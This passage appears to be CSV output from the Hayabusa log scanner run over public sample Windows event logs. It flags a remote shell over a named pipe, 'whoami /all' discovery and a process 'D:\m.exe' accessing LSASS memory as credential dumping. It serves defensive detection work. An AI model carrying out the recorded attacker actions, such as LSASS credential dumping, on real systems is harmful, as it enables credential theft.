365ABB72-D9C4-5CC7-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx 2019-04-30 05:59:14.447 +09:00,IEWIN7,18,critical,Evas | PrivEsc,Malicious Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_mal_namedpipes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx 2019-04-30 05:59:15.575 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.17:63025 (NLLT106876) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-D9C4-5CC7-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx 2019-04-30 05:59:21.539 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x10896 | PID: 3376 | PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx 2019-04-30 05:59:21.539 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3940 | Src PGUID: 365ABB72-6231-5CC7-0000-00104CF71800 | Tgt PID: 3376 | Tgt PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx 2019-04-30 05:59:21.539 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx 2019-04-30 05:59:21.539 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx 2019-04-30 05:59:22.144 +09:00,IEWIN7,10,low,,Process Access,Src Process: io\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3376 | Src PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400 | Tgt PID: 2116 | Tgt PGUID: 365ABB72-65AA-5CC7-0000-00104D882400,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx 2019-04-30 05:59:22.144 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | LID: 0x10896 | PID: 2116 | PGUID: 365ABB72-65AA-5CC7-0000-00104D882400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx 2019-04-30 05:59:22.144 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx 2019-04-30 05:59:22.144 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx 2019-04-30 05:59:22.144 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx 2019-04-30 05:59:55.472 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x10896 | PID: 2244 | PGUID: 365ABB72-65CB-5CC7-0000-001002202600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx 2019-04-30 16:22:56.571 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Temp\opera autoupdate\installer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3712 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00 | Tgt PID: 2784 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010CB280E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:22:56.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3712 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00 | Tgt PID: 3624 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:22:57.149 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3624 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00 | Tgt PID: 3504 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010AF380E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.883 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\smss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 264 | Tgt PGUID: 365ABB72-F69F-5CC7-0000-0010132B0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.883 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 336 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001033480000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wininit.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 384 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010A74B0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 392 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-00103F4C0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 440 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001043520000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 468 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001004550000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001072590000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\lsm.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 500 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010A3590000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 616 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010BB700000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\VBoxService.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 676 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010E7AC0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 740 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-00101AB00000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 804 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-00105FB40000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 872 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001015C00000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 908 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010A7C40000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 956 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001014C90000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1016 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001012CF0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1148 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010F9D80000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\spoolsv.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1288 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-00100EED0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1328 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010B8F20000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1476 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010D30E0100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1504 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-001062120100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskeng.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1572 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010051A0100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\OpenSSH\bin\cygrunsrv.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1732 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010443A0100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1904 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010F7500100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\OpenSSH\usr\sbin\sshd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1952 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-00108A560100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wlms\wlms.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1996 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-0010C65F0100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\unsecapp.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1000 | Tgt PGUID: 